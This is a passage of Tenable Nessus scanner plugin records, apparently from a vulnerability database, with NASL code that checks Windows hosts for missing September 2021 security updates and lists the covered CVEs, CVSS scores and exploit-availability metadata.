\"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005568\");\n script_xref(name:\"MSFT\", value:\"MS21-5005568\");\n\n script_name(english:\"KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005568-os-build-17763-2183-d19b2778-204a-4c09-a0c3-23dc28d5deac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54269929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005568.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005568');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005568])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:03", "description": "The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005565.NASL", "href": "https://www.tenable.com/plugins/nessus/153381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153381);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005565\");\n script_xref(name:\"MSFT\", value:\"MS21-5005565\");\n\n script_name(english:\"KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005565-os-builds-19041-1237-19042-1237-and-19043-1237-292cf8ed-f97b-4cd8-9883-32b71e3e6b44\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45dd819c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005565'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565]) \n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19043',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T17:34:34", "description": "The Microsoft Open Management Infrastructure service detected on the remote host is affected by a remote code execution vulnerability due to insufficient authentication validation. An unauthenticated, remote attacker can exploit this to execute code on the remote host as root.", "cvss3": {}, "published": "2021-09-20T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure RCE (CVE-2021-38647)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2023-08-28T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_CVE-2021-38647.NBIN", "href": "https://www.tenable.com/plugins/nessus/153486", "sourceData": "Binary data omi_cve-2021-38647.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:26", "description": "The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005566.NASL", "href": "https://www.tenable.com/plugins/nessus/153383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153383);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005566\");\n script_xref(name:\"MSFT\", value:\"MS21-5005566\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005566-os-build-18363-1801-c2535eb5-9e8a-4127-a923-0c6a643bba1d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff9fca7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005566.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005566'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005566])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005569: Windows 10 version 1507 LTS September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", 